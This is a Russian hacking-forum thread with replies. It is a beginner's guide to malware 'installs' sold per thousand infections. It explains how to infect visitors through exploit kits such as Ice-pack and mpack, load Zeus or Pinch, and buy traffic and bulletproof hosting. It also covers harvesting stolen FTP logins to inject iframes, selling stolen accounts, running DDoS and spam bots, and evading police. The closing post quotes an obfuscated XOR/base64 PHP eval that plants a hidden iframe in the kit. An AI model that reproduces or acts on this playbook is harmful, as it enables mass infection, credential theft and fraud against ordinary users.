PDA

Просмотр полной версии : Загрузки для новичков


Dave
29.04.2010, 14:18
Общее О Загрузках:
Загрузка - это загрузка и запуск файла (то-ли вашего, то-ли клиента) на компе жертвы.
Загрузки можно делать с помощью Связки Эксплоитов или Ботнета.
Я буду рассматривать более часто встречающийся первый вариант.
Загрузки наверное есть самый популярный способ распространения вирусов, зачастую троянов.
Вообще начать заниматься этим делом это требует или больших усилий, или стартового капитала,
но скажу что бы никто не пугался, вполне реально начать без денег.

Загрузки в Бизнесе:
И так, многих интересует денежная сторона этого вопроса, ну что тут сказать
да, загрузки это очень прибыльное дело, особенно если знаешь что делать и как.
Самые прибыльные загрузки это загрузки юзерам следующих стран:
AU(Австралия) - 300-550$
UK(Великобритания) - 220-300$
IT(Италия) - 200-350$
NZ(Новая Зеландия) - 200-250$
ES(Испания),DE(Германия),FR(Франция) - 170-250$
US(США) - 100-150$
Цены указаны за 1000 уникальных загрузок.
Русские и Украинские загрузки ценятся гораздо меньше - (20-40$)
Так же часто продаются микс загрузки, это загрузки которые делаються из микс трафа стоимость приблизительно такая же как и на Ru, Ua

Биз Загрузки
Но это что касается если грузить клиенту файл, но вы ведь можете грузить и свой файл,
что вы можете грузить? ну например Zeus, формграберы, банковские трои (это уже относиться к кардингу) и пр.
Если вы грузите файл клиента, то понятно вы получаете деньги, но если же вы грузите файл для себя, что в таком случае?
Что мы получаем? все зависит от файла который грузим, К примеру если мы будем грузить Зевс ну или на крайней случай пинч, а может и приватный трой, мы получаем отчеты, а что в отчетах ? информация, там может быть
что угодно, от номеров icq до Банковских аккаунтов (З.Ы. В кардинг опускаться не буду), из них можно много чего извлечь,
особенно если трафик Бизнес, но для этого вам придется поднапрячься читать их, даже поиск не даст того результата что даст индивидуальное чтение всех отчетов.
Советы по извлечению инфы читайте в FAQ.

Не Биз Загрузки
В нынешнее время трудно добыть бизнес фтп, и что же тогда делать если он не биз?
Не Биз траф так же активно используеться для Сокс ботов, Ддос ботов, Спам ботов, и пр. а из этих ботов можно извлечь не малую выгоду, умея грамотно их продавать или использовать.
Так же в данный момент существуют партнерки как по загрузкам так и по трафику.
По трафику они конвертируют его в загрузки, ну а загрузки платят за 1000 инсталов
Не хочу никого обидеть, но я бы не советовал бы сливать трафик в партнерку, ибо никто не знает как оно там…
может траф разветвляется и идет на много сплойтов итп. а Загрузки же, ну лучше всегда знать что грузишь, если не волнует то можно
грузить для партнерки.

Каждый новичек (не просто в загрузках, а и в хек бизе) увидит цифры, и сразу подумает все это мое, буду загребать миллионы, но это гораааздо сложнее чем кажеться на первый взгляд.

Так с чего же начать? Коротко про Эксплойты.
Нам нужно:
1)Трафик
2)Связка
3)Старание (или Деньги)
Начинать все таки надо с трафика ([Ссылки доступны только зарегистрированным пользователям]) Ибо если не будет трафика то не будет загрузок, по моему логично )
Если у вас есть 1000 уинков трафа в сутки это не значит что у вас будет 1000 загрузок в день, это в любом случае, в самом лучшем с 1000 трафа будет 500 загрузок, но на Забугорном (Забугорный значит Заграничный, типа Европа, Америка итп)
трафике будет еще меньше.
Так вот вернемся к тому с чего начинать, У нас уже есть трафик, нам еще нужна связка эксплойтов
Эксплойт это скрипт позволяющий через уязвимость в какой либо программе (зачастую Браузер) выполнить необходимое действие,
например загрузить и запустить файл. Подробнее об Эксплойте ([Ссылки доступны только зарегистрированным пользователям]). А связка эксплоитов это "сборник" эксплоитов сшитых в один скрипт.
Впринципе Связку найти не проблемма, гораздо сложнее понять насколько она грамотна сделана, нет ли в ней вражеских скриптов
ну и какой Пробив(КПД) у нее будет (Пробив Связки = (кол-во загрузок с 1к связки/1000)*100 %) А на самом деле с 1к трафика определить пробив точно нельзя
он зависит от трафика, обычно для теста связки берут 20к трафика, а то и больше.
Итак самая пожалуй известная связка Всех времен это mpack на основе эксплоита mdac, а все остальные уже схожи, на него.
Вот пара Связок которые имеются в паблике и более менее нормальные :
Ice-pack |_скачать можно(Ice, Fire - pack)
Fire-Pack | тут ([Ссылки доступны только зарегистрированным пользователям]), пароль: zagruz
Ad-pack
mpack
З.Ы. есть и другие, но все же думаю выкладывать их нету смысла.
Если порыться то можно их много найти, но опасайтесь вражеских скриптов(ифреймов), зачастую они стоят или в индексе или в эксплоитах, или в инклудах ранее перечиленых страниц.
О платных связках я говорить тут не буду, ибо стоят дорого, новичкам не по зубам, но все же перечислю их это есть Ad-Pack+, связка от Nuclear, Неосплойт и другие.
Лично я использовал из паблика Айс пак, и вам его советую.
Возникает еще одна проблемка - Связки палятся, к сожалению если вы не знакомы с пхп то это вам не решить, но
есть люди которые спрячут от антивирусов связки за денюжку(только желательно с ними работать через гаранта, или предварительный показ результата) или за так.

Еще немного расскажу о Пробиве, он может быть разный, на связках типа Айс пак, пробивается практически только один ИЕ(Internet Explorer)
Обычный пробив на Ру трафе, непалящемся состовлял 33% В пробиве многое зависит от трафа
К примеру русский траф имеет больший пробив потому что многие юзают крякнутый софт, пиратки, итп, это крякнутое по делает форточки для сплойтов.
Забугорный же траф дает меньше поскольку там зачастую лицензионное ПО, но при этом оно старое, к примеру у нас любители свежатины давно сидят на ИЕ 7
но там можно встретить фирмы на которых до сих пор стоит ИЕ 5, пробив на Забугорном на Айсе был ~ 20-25%[Траф может быть и Адалт (Для взрослых) который имеет пробив 5-10%
З.Ы. про настройку связки ничего не говорю ибо это много

И опять таки Хост
Для содержания связки нужен хост, да с поддержкой MySQL и PHP, да желательно абузоустойчивый, потому что если вы укоренитесь в этом деле, а потом нечайно прийдет
абуза, то все полетит к чертям. Но несмотря на это вам хватит всего лишь хоста на 50 мб, а это ~20-25 $ в месяц, хотя как по мне новичкам можно
и на бесплатном, если имеется трафик, но будьте готовы что однажды хост залочат.

Вот у вас уже есть Связка, траф и Хост,в принципе это все что нужно для Загрузок, советую пару дней просмотреть какое количество загрузок у вас будет (продают не меньше 1000 загруок) а затем уже постить.
Ниже расскажу про пару фишек.

Самотрафикация
Какое умное слово я придумал, что я под ним подразумиваю, это значит использовать загрузки, для получения большего количества трафа,
берем грузим пинч, снимаем отчеты и экспортируем Фтп затем FTP TOolZ'ом ([Ссылки доступны только зарегистрированным пользователям] ) Чекаем фтп и Фреймим их, и получаеться вы нарабатываете обороты, трафа, а соответственно и Загрузок.

Дополнительные Эксплойты
Вы всегда можете добавить к своей связке несколько дополнительных Эксплойтов, если конечно имеются знания языка php и иногда некоторых
других языков, все доступные массам эксплойты стекаются на milw0rm ([Ссылки доступны только зарегистрированным пользователям])
Но знайте что бы добавить эксплойт нужны навыки и знание как с ними работать, добавление Эксплойтов увеличит кпд связки. Так же есть приватные 0day эксплойты которые стоят много денег)


Советы и FAQ:
Вопрос: Что можно делать если загружаю свой файл(трой\бот)?
Извлечение информации из отчетов являеться важнейшей частью, главное не пропустить что либо ценное,
Вам может попасться Админка какого нибудь Бизнесс сайта, вы сможете подменить кошелек, получить деньги,
да и в конце залить шелл и поставить фрейм, внимательно смотрите на все что можно продать, акки пайпал, еголд, Яндекс Деньги, САР сайты, партнерки. Отчеты можно продавать, другим людям, но имхо это не выгодно.
Если делаете загрузки троя сами то приготовьтесь к тому что надо будет копаться в отчетах.
Но Трой это не единственная вещь которую можно грузить, я писал выше про Сокс, ддос, спам ботов, так вот
вы можете даже организовать свой сервис по продаже соксов, или спам сервис, ну или ддос сервис, будете валить конкурентов солидных фирм.
То есть Фактически из загрузок может вытекать практически любой другой вид Заработка, так что дерзайте!

Вопрос: Кому лучше всего продавать Загрузки(Траф)?
Лучше всего конечно продавать проверенным покупателям, Которых все знают и уважают, но далеко не всегда получается с ними работать
Но на благо мудрые люди придумали такого человека как Гаранта, вы проходите проверку гарант пишет что вы прошли проверку и имеете товар,
И после этого от покупателя вы можете просить деньги вперед, так же хорошо бы перед тем как начать работать с человеком проверить
не кидала ли он, в этом поможет сайтец куда записывают всех зарегестрированых кидал kidala.info

Вопрос: Чего следует остерегаться продавая загрузки?
В первую очередь кидал.
Остерегаться так же нужно того что бы сплойт не спалился и что бы файл Клиента или ваш не палился Антивирусами потому что если спалите сплойт то админы спалят фрейм а значит минус траф уже, да и желательно всегда знать что вы грузите,
потому что есть некоторые вирусцы за распространение которых вами могут заинтересоваться Добрые дяди, ну это на крайней случай, не пугайтесь.

Совет: Лучше всего работать с Забугорным трафом, потому что наше ФСБ или СБУ не очень хочет сотрудничать с ФБР, и в том что буржуи вас на родине не тронут
ну это так если вдруг там что то серьезное.

Совет: Если вы работаете с Забугорным трафиком, то для проверки посещаемости ресурса проверяйте по alexa рангу [Ссылки доступны только зарегистрированным пользователям] чем он меньше
тем больше там посетителей, но знайте ранг не равен количеству посетителей!

Вопрос: Какие Чекеры фтп вы еще знаете?
ну есть много чекеров. зачастую приватные, на Айс-Паке есть встроеный чекер и фреймер. Так же стоит сказать о платном чекере Мани Мэйкер тоже неплохая вещь,
Еще вот недавно тести Бетку нового чекера Antichat FTP Checker by RaZzZaR впринципе ничего, в ближайшее время должен будет выйти в паблик
но все же я советую Фтп тулз (имхо) лучший.

Вопрос: ФТП тулз не работает, и чекер на айспаке тоже что делать?
Скорее всего вы используете хостинг на котором запрещено подключение к другим фтп (типа jino-net.ru)
Или же вы неправильно, что-то настроили.

Вопрос: Где можно купить продать загрузки/траф ?
Ну насколько я знаю самый известный сайт на данный момент это traffboard.cn ([Ссылки доступны только зарегистрированным пользователям]) там можно продавать и загрузки, и траф, так же там можно посмотреть ценовую характеристику покупаемых стран не указаных в статье

Вопрос: Почему Au загрузки дороже всех?
Ну Поскольку в основном бизнесс траф идет с USA и с AU, это уже дает ценность Австралии, но к сожалению много американцев порноманьяки (достаточно посмотреть куки Американцев что бы все понять) в Австралии очень качественный биз траф, нередко использующийся для Кардинга.
качество Ау трафа мона проверить поставив его на партнерку атиспайвары.

Вопрос : Почему сразу не продавать загрузки? Там же цена выше значительно... Или в трафф уходит то, что не пробивается сплойтами?
Дело в том что загрузки делать гораздо сложнее, на 1000 загрузок может уходить до 10к трафика (в зависимости от качества), а добиться 10к в сутки что бы делать 1к загрузок весьма трудно для новичка, ну конешно если вы знаете пхп и вы сможете изменить связку, сделать ее лучше что увеличите пробив то тогда все карты вам в руки. А траф не пробитый сплойтами в продажу дают не хорошие люди(имхо)

Источник: Античат

rf4fun
05.10.2010, 01:00
Есть более подробный мануал по установке и настройке связок на сервере?

olegteror
05.10.2010, 01:59
Есть более подробный мануал по установке и настройке связок на сервере?

Ага.Мозг называеться...к сожелению пруф линк дать не могу...хотя...

Z4H
21.10.2010, 20:08
Сори за оффтоп:
Есть ещё 1 интересный способ загрузки инсталлов жертвам и лёгкой активации.
Сейчас в режиме теста.Способ рабочий,но эффективность немного меньше,нежели хорошая связка.
Если всё будет удачно выложу описание.

lexxel
06.11.2010, 18:03
Мне нужны сообщения.
Поэтому: спасибо, пожалуйста и т.д.

А по теме - небольшое руководство по спредингу на английском.

.:: Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)) ::.
пароль стандартный.

maulo
19.11.2010, 22:57
По теме, - как криптовать связки експлоитов чтоби неспалитса админам , и чтоби неспалит ифрейм вставку?

WestSide
20.11.2010, 20:28
В самом начале сказано -
вполне реально начать без денег.
это нереально, затраты будут полюбому, во первых нужен хостинг, во вторых надо криптовать бота(хотя это можно самому сделать) далее нужно будет как то заразить юзеров, конечно можно ходить по хак порталам и клеить проги но это вариант для конченных г*ндонов, но лучше поставить связку или купить лоады - опять же нажны деньги, либо на хостинг, либо на загрузки, далее любая паблик связка будет оч сильно палиться, придется криптовать а это еще - из вашего кошелька, либо же можно научиться самому криптовать, и вот финишная прямая моего поста - вам нужен будет антиабузный хостинг цена которого около 150$ :)

ЗЫ добавьте Азию - 8$ за 1к

micpotop
09.01.2011, 19:55
Что то я не пойму а как адрес моего сайта все узнают? Или мне нужно машины спамить и там указовать адрес сайта с эксплойтами?

dokzlo13
10.01.2011, 21:50
и на бесплатном, если имеется трафик, но будьте готовы что однажды хост залочат.
мда, у меня через 2 дня после установки все улетело к праотцам с сервера...

ну или ддос сервис, будете валить конкурентов солидных фирм.
как по мне, с этого лучше начинать, ибо тут нет копания в отчетах. но при этом тут нужно чтобы было ооочень много загрузок, ато хорошую бот-сеть не построить.

Enable
10.01.2011, 23:52
спасибо за статью терь я знаю как раскидать пинч хД я серьёзно я на загрузки не обращал внемания даже не читал что это такое и зачем нада думал на депозите деньги зарабатывать)

onthar
11.01.2011, 12:51
А что ты с депозита качать решил? На загрузках заработать?
Лоадеры читают прямые ссылки. Лоадер, способный качать с депозитов - бред, сколько он весить будет? А как палиться?

Автор статьи - Sharingan, ачат/showthread.php?t=58732

bertolai
11.01.2011, 21:21
Да не.. за денежку напишут ему модуль такой.
Дороговато правда может встать.

Antiment
30.01.2011, 11:37
Статья действительно стОящая,но нет ничего по настройках этих фреймов и сплоитов,тоесть,нет более подробного описания как их использовать и настраивать.

WestSide
31.01.2011, 11:11
Вот еще один крик души. Человек реально пользовался продавцами загрузок. и описал реальную ситуацию.
В итоге что?
В итоге его сайт ддосят Нехотя они чтобы люди знали правду.
Вот его заметки оттредактированная немного мной.

«Вот уже как год мне, по роду своей деятельности, приходится сталкиваться c сервисами загрузок… Для тех, кто не совсем в теме, поясню – загрузки (они же инсталлы), это установка на определенное количество компьютеров в интернете «ехе» файла заказчика. Проще говоря, реккс пекс крекс, и вуаля! За 15-20 долларов ваш «ехе» разлетается на 1000 компьютеров.

Так было по задумке… Еще в этой же задумке был метод распространения – и метод этот был эксплоит! (для тех кто не в теме – это заражение уязвимых компьютеров через посещение веб сайта) Про эксплоитный метод орали на каждом шагу, в том числе в многочисленной рекламе и купленных «проверках»

По ситуации на март 2009-го все уже знали, что это за сервисы… что «грузят» они не через эксплоиты, а через лоадер, что у них совсем маленький ботнет и т.п. Но… Всех устраивало…. Относительно терпимо было. Из заказанных 1000 инсталлов 300-400 могли жить 2 дня, а 50-100 – неделю…

По ситуации на март 2010-го я вижу следующее – по отзывам людей и по моим наблюдениям из 1000 «загрузок» через считанные минуты не остается ничего – вообще ничего (!)
Под катом продолжение, факты, координаты УРОДОВ.

Несколько фактов:
- В сети много предложений загрузок, но все они имеют общие корни (!) Это видно по всему; одинаковые движки сайтов и т.п. Если что-то сломалось то резко перестают работать ВСЕ сервисы разом, селлеры пропадают или лепят левые отмазки

- грузят они лоадером, а не эксплоитом (с недавнего времени и не скрывают)

- ни о какой уникальности загрузок не может быть и речи – все грузится на одни и те же зомби-машины, которых очень мало (!)

- Долбанный загрузчик всегда проверяет ЕХЕ (НАХРЕНА?) При этом минут на *цать тормозя в аське.

- Долбанный загрузчик всегда интересуется не перезагружает ли ЕХЕ компьютер и не АнтиСпайвар ли это? (!) (ну какое твое дело что я там гружу, если загрузка уникальная!!!????)

- Долбанный загрузчик ВСЕГДА готов вернуть часть денег или даже всю сумму, чтобы только не писали жалоб и блэков.

- на офицальных сайтах этих козлов всегда нарисованы кучи баксов, бэнтли и т.п. Типа с нами озолотишься… Если кто озолочается так это они… Оборот таких цыган несколько тысяч долларов в месяц.

- Долбанный загрузчик всегда ссылается на неведомого дядю, на которого он работает… Сам он не знает ни как проходит загрузка, ни техническую часть процесса тем-более.

- Лоадер Долбанных загрузчиков удаляет ЕХЕ, который загрузил! (вообще в хлам оборзели!) Применяются разные технические методы, запуск от учетки system и прочее

- Новые фишки типа «плати нам 300 баксов и получишь сервис лучшего качества» вообще выше моего понимания…

Мой вам совет – НЕ ПОЛЬЗУЙТЕСЬ УСЛУГАМИ ЭТИХ УРОДОВ! Лучше потратить время и деньги на организацию своих «загрузок», чем потерять хоть и малые, но деньги, на этих уродах! На нормальных загрузках «смертность» минимальна…

Вот все координаты этих мего-сервисов кидал: (имена доменов специально переписаны по-русски, чтобы поискови не индексировали)

Инсталлс_фо_ю.биз: installsforyou.biz
[Ссылки доступны только зарегистрированным пользователям] [Ссылки доступны только зарегистрированным пользователям]
375-518-509, 562728156, 577899890, 393150767, 438637552

Инсталлс_маркет_ком:
462669012, 583478236, 459137, 352503, 599684321, 443508620

Инсталлс_маркет_нет installsmarket.net
[Ссылки доступны только зарегистрированным пользователям] те же самые что и Инсталлс_маркет_ком:
Support #1: ICQ 599684321 Support #2: ICQ 462669012
Support #3: ICQ 593182048 Support #4: ICQ 583478236
Support #5: ICQ 414888476

Инсталлс_диллер.ком: installsdealer.com

[Ссылки доступны только зарегистрированным пользователям]

296391, 533273, 552427361, 556752679

Инсталлс_4_сэйл.ком: installs4sale.net

[Ссылки доступны только зарегистрированным пользователям]

556752679

Лоад_диллер:
590674786

Ни в коем разе не пользуйтесь! Так же не стоит верить объявлениям на форумах о новых мега-сервисах загрузок. Ничего нового там нет – это все те же УРОДЫ с той же аферой.»

by [Ссылки доступны только зарегистрированным пользователям]

Apocalypse
31.01.2011, 15:41
Мде, в шапке форума их реклама :puke:

Но все же в России живем, не на**ешь не проживешь... как-то так... :rolleyes:
//// Матег aka Russian

olegteror
01.02.2011, 21:01
Но все же в России живем, не наебешь не проживешь... как-то так...

Понимаешь...за сервер то чем то платить нужно:)

Apocalypse
01.02.2011, 21:18
А я никого не обвинял :)

MillenniuM
11.02.2011, 15:39
эта статья - то что я искал !

by_dmr
10.03.2011, 22:30
Предупреждаю, в файле index.php связки ice-pack стоит чужой iframe:

// $key=40;
//$str="FEFOWklFTQhbWksVCkBcXFgSBwdDWl1cQUMGQUZORwdBRkxNUA ZYQFgKCF9BTFxAFQoYCghATUFPQFwVChgKFhQHQU5aSUVNFg==";
// $len=strlen(base64_decode($str));
// $str=base64_decode($str);
// $ev='';
// for($i=0;$i<$len;$i++){$ev .= chr(ord($str[$i]) ^ $key);}
// eval($ev);

Это закодированая строка:
<iframe src="[Ссылки доступны только зарегистрированным пользователям]" width="0" height="0"></iframe>